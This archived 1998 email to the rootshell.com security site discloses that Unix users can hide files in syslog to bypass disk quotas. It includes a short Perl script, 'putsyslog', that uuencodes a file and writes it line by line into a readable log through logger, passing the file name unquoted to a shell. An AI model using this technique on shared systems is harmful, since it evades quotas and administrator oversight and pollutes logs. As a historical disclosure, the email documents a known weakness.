[ http://www.rootshell.com/ ]

From paul@boehm.org Wed Jul  8 10:18:27 1998
Date: Wed, 8 Jul 1998 19:08:41 +0200
From: Paul Boehm <paul@boehm.org>
To: www-request@rootshell.com
Subject: putsyslog

hi,

users can write messages to syslog and thus hide files in there and
bypass quotas.. later they can extract it if they have read access
to the logfile. i already wrote a perl script that puts an uuencoded 
file in syslog... but now im too lazy to write a script/program to 
extract it.. anyway, here's putsyslog:

--snip--
#!/usr/bin/perl
#Putsyslog - puts a file in syslog using logger and uuencode
#  maybe i'll write a getsyslog someday.. but rather not
#
#         infected@cia.at

$file = shift || "file";
$loglevel = shift || "daemon.info"; # something that goes
                                    # to a pub readable
                                    # logfile
open(UU,"uuencode $file $file |");

while (<UU>) {
  chomp;
  s/\\/\\\\/g;
  s/\"/\\"/g;
  s/\'/\\'/g;
  s/\`/\\`/g;
  system("logger -p $loglevel \"[PUTFILE] $file $_\"\n");
}

close(UU);

print "done logging $file to $loglevel\n";
--snip--

-- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Name: Paul S. Boehm               ||  Freelance Security Consultant.
    Email: paul@is.destructive.org  ||  PGPkey available at:
       Url: http://paul.boehm.org/  ||  http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is is no reason for any individual to have a computer in their home.
              --Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-